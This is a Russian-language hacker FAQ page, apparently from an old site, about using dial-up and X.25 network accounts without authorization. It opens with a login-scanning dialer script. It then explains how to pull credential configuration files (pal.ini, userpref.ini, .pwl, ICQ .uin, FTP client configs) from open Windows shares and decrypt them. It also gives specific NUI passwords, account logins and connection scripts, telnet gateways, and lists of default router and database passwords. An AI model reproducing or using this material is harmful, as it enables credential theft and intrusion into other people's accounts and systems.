goto con0

con2:

TRANSMIT "%LOGIN%^M"

WAIT "assword:|UIC:|@|}|onnected to|error|not allowed" , 40

CHECK "assword:" , con3

CHECK "UIC:" , con4

CHECK "@" , tryagain

CHECK "}" , found

CHECK "onnected to" ,con6

CHECK "error" ,con6

CHECK "not allowed" ,con6

con3:

TRANSMIT "%LOGIN%^M"

WAIT "assword:|@|}" , 40

CHECK "assword:" , con3

CHECK "@" , tryagain

CHECK "}" , found

con4:

SAVEFOUND

goto con2

con5:

SAVEFOUND

goto con3

con6:

SAVEFOUND

READRECORD

goto con7a

con7:

TRANSMIT "guest^M"

con7a:

WAIT "Name:|ASSCODE:|assword:|sername:|ogin:|ID|@" ,90

CHECK "Name:" , con0

CHECK "ASSCODE:" , con7

CHECK "assword:" , con7

CHECK "sername:" , con7

CHECK "ogin:" , con7

CHECK "ID" , con7

CHECK "@" , try2

found:

SAVEFOUND ; save login, seems to be valid, in ultra.fnd

WAITFOR "@" , 90

goto tryagain

tryagain:

READRECORD

try2:

goto con

----- end

Q. Как достать uic и password?

A.Аккаунты ко всему достаются путем сканирования на открытые шары, и uunet тут не исключение. Другое дело, что подобные аккаунты хрянятся не где обычно (PWL),а в конфигурационных файлах программы доступа к конкретной сети. Для этого необходимо скачать соответствующую программу доступа, изучить где она хранит данные о пользователе, и тянуть с шар этот файл, потом у себя скормить спертый файл программе доступа если кто-нибудь еще не подсуетился и не написал расшифровщик, и выбить из неё необходимые данные (с помощью например все того же openpass'a)

Программа доступа для uunet называется phone access lookup.Имеется и расшифровщик конфигов, написанный barvinok.

updated: х..ли шифровать, и так все знают =) \progra~1\pal\pal.ini оно как правило лежит =)

(или \progra~1\pal95\pal95.ini или... возможны варианты)

updated: многие вот жалуются, что мол нету нигде этих pal.ini. Hint: на всем известных диапазонах (212.211. и т.д.) на win95-машинах эти файлы мне почему-то попадались крайне редко.

Q. Как мне использовать закрытые для России аккаунты worldcom?

A.Cуществует много вариаций, например:

1)exec shell циски на каком-нибудь из хостов к которым доступ разрешен.

Попав туда набираем: pad 2111855, или pad 3132 (или pad 31329 - точно не помню).

А может, циска уже имеет доступ в инет и можно подсоединиться к telnet гейту набрав скажем telnet 212.211.79.137 4145. В некоторых случаях вам может понадобится установить второе ppp соединение, о чем уже до фига писалось. отсылаю всех к статье eadle

2)попробовать через грик (некоторые домены имеют роуминг по умолчанию.

например таким был @hp.com (hostname hpco), но из-за наплыва халявщиков недавно был закрыт. Однако таких доменов еще немеряно)

3)выходя в уунет через какие-нибудь левые сети (но тут как я писал раньше нужен NUI)

updated: всё равно это уже стало народным достоянием, так что и рассказать об этом не грех. Практически все подобные аккаунты можно использовать через хост wcdial с паролем sr1p.hpf или же запуская ppp не дожидаясь приглашения host name:, то есть скажем не жимкая в РОЛе после захода под [email protected]:

proc main

waitfor "ogin:"

transmit "[email protected]^M"

waitfor "word:"

transmit "[email protected]^M"

endproc

Так можно использовать почти все логины, найденные на ворлдкомовсих диапазонах и не только ;). В pal.ini они как правило хранятся в параметах host_user или

host_pw:

Info #0 : [email protected]

Info #1 : host_pw=28Faz6m7

тогда как следующее - для использования через x.25:

Info #0 : HostName=hpco

Info #1 : UserID=m00108415

Info #2 : Password=28Faz6m7

Q. Как установить второе ppp соединение под *nix?

A.Hужно воспользоваться программой которая может перенаправлять свой ввод и вывод на виртуальный терминал (pty) и настроить pppd на работу с этим самым pty. Пример таких программ - modemu (читаем ее документацию), pty-redir (читаем VPN-howto или mini-howto, не помню уже. там все показано на примере, правда не pppd а ssh)

Q. Какие домены грика до сих пор работают? как мне включить роуминг на [domain]?

A.Работающих (не закрытых для России) доменов осталось очень мало, поэтому ясное дело никто не хочет их светить. попробуйте поискать сами =) список всех провайдеров входящих в консорциум .

Точно также и с включением роуминга - просто там никто не скажет, ищите на сайте провадера сами.

updated. Сейчас с включением роуминга на Россию стало вообще тяжело - по умолчанию его уже не делает вроде никто, и сделать его очень тяжело.

Q. Как узнать ip-диапазоны dialup'а буржуйского провайдера [kewlprovider]?

Я делал очень просто - заходил на irc в очень многопосещаемый канал (типа #usa , или #japan когда речь шла о каком нибудь ocn.ne.jp =)) и просто там висел. Потом просматривая логи joins/parts, можно было видеть что нибудь типа:* ivangovnov ([email protected]) has joined #usa то что нам и надо.

updated. Оказывается даже после этого люди не могут найти эту галку =)

А я уже и вспомнить не могу, где ее когда-то ставил. По моему это в категории IRC не выбирая подкатегорию ставим show addresses и убираем short joins/parts

Q. Можно ли использовать аккаунты грика через x.25 сети?

A.Интересующихся этим вопросом советую скачать GRICdial, там есть довольно интересный скриптик =)

updated: не поленился скачать и вырезать из него то что надо

proc main

transmit "...^M"

waitfor "SITA NETWORK"

transmit "NUI 28700001^M"

waitfor "password"

transmit "H1VW9R^M"

waitfor "active"

transmit "2124172001^M"

waitfor "connected"

endproc

раньше было NUI 51290001 pass fcifhn - сейчас вроде как оно не работает

Q. Как использовать через x.25 аккаунты equant, не работающие на прямых пулах?

A.Можно попробовать (через SITA NETWORK):

NUI 77630001 pass 95p6ip NUA 9003157001 //updated -- этот nui вроде как не пашет

NUI 06040091,pass rffc3r NUA 4444769001 2315777001 2164693002

NUI 95600001,pass ddsmwf NUA 9003153001 9003154001 и тд

updated: ещё пробуйте nui 22421028 pass x4cfuo, nui 79900001 pass 1rg0fv

Q. Как использовать аккаунты AT&T?

A.Раньше работало следующее:

Через IBMNET:

proc main

transmit "*CLR"

waitfor "Please Sign-on:"

transmit "[email protected]^M"

waitfor "Password:"

transmit "569365964^M" - может быть любым.

waitfor "Please Sign-on:"

transmit "ваш аккаунт AT&T,ваш пароль AT&T"

waitfor "}"

endproc

Через INFONET:

proc main

waitfor "ogin:"

transmit "wvpn03*xwnet04^M"

waitfor "assword:"

transmit "wvpn03oz^M"

waitfor "connected"

transmit "^M"

endproc

Сейчас для аккаунтов @worldnet.att.net это вроде не работает (?)

Аккаунты же вида @nbn1.newyorklife.com.ics-ip.att.net можно использовать через инфонет без скрипта, на ibmnet не пробовалось.

updated. Думаю что эту инфу можно уже выкинуть, но... пусть будет на память =)

Q. Как узнать адреса DNS серверов для провайдера [kewlprovider]?

A.Как правило если при установлении ppp соединения удаленная сторона не сообщает вас адреса dns, то в принципе в свойстве соединения можно прописать адреса любых dns серверов. Если все-таки нужны адреса обслуживающие конкретный домен, то:

запускаем nslookup

говорим ей set type=ns

и после этого вводим домен для которого надо узнать адреса, например rosnet.ru

Q. Можно ли использовать аккаунты МТУ не в Москве?

A.В Роснете есть (был?) ppp вход в МТУ Посмотрите nua 600814055 600290504 или поищите по старым публикациям про роснет.

updated: появился и пул в Питере - 3801108

Q. Есть ли гейт inet->[любая x.25 сеть]?

A.В любую x.25 сеть из инета можно попасть через диалаут, которые иногда встречаются на просторах сети (как их искать - читай статью в x25zine#1) без диалаута можно попасть например сюда:

telnet 194.186.138.131 (rol)

telnet 212.211.79.137 4145 (uunet)

telnet x25pad.autonet.net (autonet)

telnet lon.telnet.ja.net (janet)

telnet 192.156.137.139 2600 (вроде SITA)

telnet 194.67.8.161 8099 (SOVAMNET)

Q. Как использовать в России аккаунты ipass?

A.Через РОЛ, добавляя перед логином "IPASS/". например:

IPASS/000066638963044478010#[email protected]

updated. Так уже я думаю хрен вы заюзаете потому что вроде как поставили ограничение на количество подобных входов и теперь все время выкидывает с rad_fss_reply() (в отличие от cu_reply() что значит по данному аккаунту уже кто-то сидит).

Но некоторые аккаунты до сих пор можно использовать через ситу:

nui 37830001 pass 98Z8VJ nua 9001252001 - это "родная" информация, тут возможны варианты.

а вообще вот вам кусок вроде как официальной документации от ipass, вот и разбирайтесь:

Script: sci-w95.scp, Platform: w95

; REV: SZ/2-03-97

; Main entry point to script

;

proc main

integer nTries = 3

delay 2

while nTries > 0 do

transmit "...^M"

waitfor "SITA NETWORK" then DoLogin until 5

nTries = nTries -1

endwhile

; timed out

goto Abort

DoLogin:

delay 2

transmit "NUI 06790263^M"

waitfor "password"

delay 2

transmit "ZERTYB^M"

waitfor "active"

delay 1

transmit "2123140001^M"

waitfor "connected"

goto Done

Abort:

; allow manual completion

set screen keyboard on

halt

Done:

endproc

Script: oze-w95.scp, Platform: w95

-----------------------------------------------------------------

proc main

delay 2

transmit "^M"

waitfor "ervice?"

transmit "P"

transmit "^M"

waitfor "sername:"

transmit $USERID

transmit "^M"

waitfor "assword:"

transmit $PASSWORD

transmit "^M"

delay 2

endproc

Script: uun-w95.scp, Platform: w95

-----------------------------------------------------------------

proc main

integer count = 0

transmit "^M"

delay 1

transmit "^M"

delay 1

transmit "^M"

delay 1

while count < 5 do

transmit "^M"

waitfor "Login:" until 2

if $SUCCESS then

goto DoLogin

endif

count = count + 1

endwhile

halt

DoLogin:

transmit "IPASS/" + $USERID + "^M"

waitfor "Password:"

transmit $PASSWORD + "^M"

waitfor "ppp"

endproc

Script: voy-w95.scp, Platform: w95

-----------------------------------------------------------------

proc main

transmit "^M"

waitfor "service?"

transmit "ppp"

transmit "^M"

waitfor "sername:"

transmit

transmit "^M"

waitfor "assword:"

transmit

transmit "^M"

waitfor "witching"

endproc

updated 23. А где их взять, эти аккаунты ipass?

A.мне они часто попадались на всё том же любимом диапазоне wcom'a:

файл \progra~1\ipass\ipassco~1\userpref.ini, для извлекания пароля - тянем ipassconnect

updated 24. Вот сканерю я, а какие файлы обычно люди с шар тянут?

A. аськины uinы:

\progra~1\icq\2000a\??????.uin

\progra~1\icq\2000b\??????.uin и так далее

конфиги диалеров, например \windows\edialer.ini

\progra~1\ipass\ipassco~1\userpref.ini - ipass

\progra~1\ipass\ipassco~1\ipass.ini - ipass

\progra~1\at&t\wns\user\account.* - at&t dialer, как его там

конфиги ftp клиентов, типа \progra~1\ws_ftp\ws_ftp.ini - там часто можно

обнаружить аккаунт на шелл

ну и про *.pwl и system.ini и так все знают

updated 25. как найти dialout?

A. про это было написано в x25zine#1. вкратце - открытые модемы в основном висят на портах 2001-2012. сканим и ищем =) а еще бывает на 4001-4012 или 6001-6012.

updated 26. Дайте мне диапазоны где сидят диалапщики hp.com, kpmg.com и т.д

A. Нет у них своих диапазонов, потому что это - не провайдеры, а компании занимающиеся более другими делами, а в инете их работники или кто они там, эти люди с аккаунтами, сидят через worldcom, так что и искать их надо там.

updated 27. Как по ситовскому nua определить местоположение?

A. формат адреса:

2 XX X YYY

XXX - код страны, например 270 - Россия.

updated 28. Какие есть пароли по умолчанию на всякие там роутеры?

A.вот некоторые из них (собранные вроде cyberliric'ом)

------

default passwords for BayNetworks equipment

routers(AN AHN ARN) - no passwords as default

workgroup switches - login:Manager

manager/manager

security/security

monitor/monitor

default CISCO routers

password: cisco

(works on 20-30% of hosts )

On 3Com products try SuperStack as password

Security Vulnerability in Motorola CableRouters

The CableRouter leaves an open telnet port at port 1024.

Furthermore, the CableRouter performs absolutely NO logging of

connections - you can connect and never be seen.

Login: cablecom

Password: router

defaul account for many old unixes:

login: sync

with no password

(can be used with LDPRELOAD exploit)

Default Account for MS SQL Server

Username: sa

with no password

InterBase default account

SYSDBA/MASTERKEY

Novell Netware

default accounts - SUPERVISOR, GUEST,

and Netware 4.x has ADMIN and USER_TEMPLATE as well.

All of these have no password to start with.

-----

updated 29. А я слышал, что можно коннектиться к compuserve через Петерлинк

A.У них на сайте лежат скрипты для WinCIM'а но я их не изучал.

updated 30. А как находить расшаренные диски? у меня сканер ничего не находит

A.Это наверное вопрос номер 1 на всех форумах =) хоть он тут и не очень в тему ответим.

Чтобы правильно работал сканер надобно:

чтобы в свойствах соединения с инетом стояла галка "вход в сеть"и были установлены следующие компоненты:

протокол tcp/ip и "контроллер удаленного доступа" (естественно)

клиент для сетей microsoft

и (вроде бы) протокол NetBEUI

updated 31. А некоторые диалеры типа GRICdial хранят всю информацию в реестре.Что делать?

A.Подмонтировать диск и заюзать Registry Viewer - тогда можно будет обойтись без скачиавния всего реестра.

seo & website usability   html   os faq   hardware faq   memory   video   cpu   hdd   mainboard faq   printer & scaner   modem   mobiles   hackzone

Internet
WAN
HTTP
X25 сети
Протоколы
Telnet
Cookies
DNS faq
IRC faq
SOCKS
Inet faq
IP faq
FTP faq
GPRS faq
Ports faq
Протокол SMTP
Протокол IMAP
Mail faq
The BAT faq
Home LAN
Office LAN
Настройка шлюза
Проблемы администратора
Выбор кабеля
Ресурсы локальной сети
LAN faq
WLAN faq
Wi-Fi

На главную | Cookie policy | Sitemap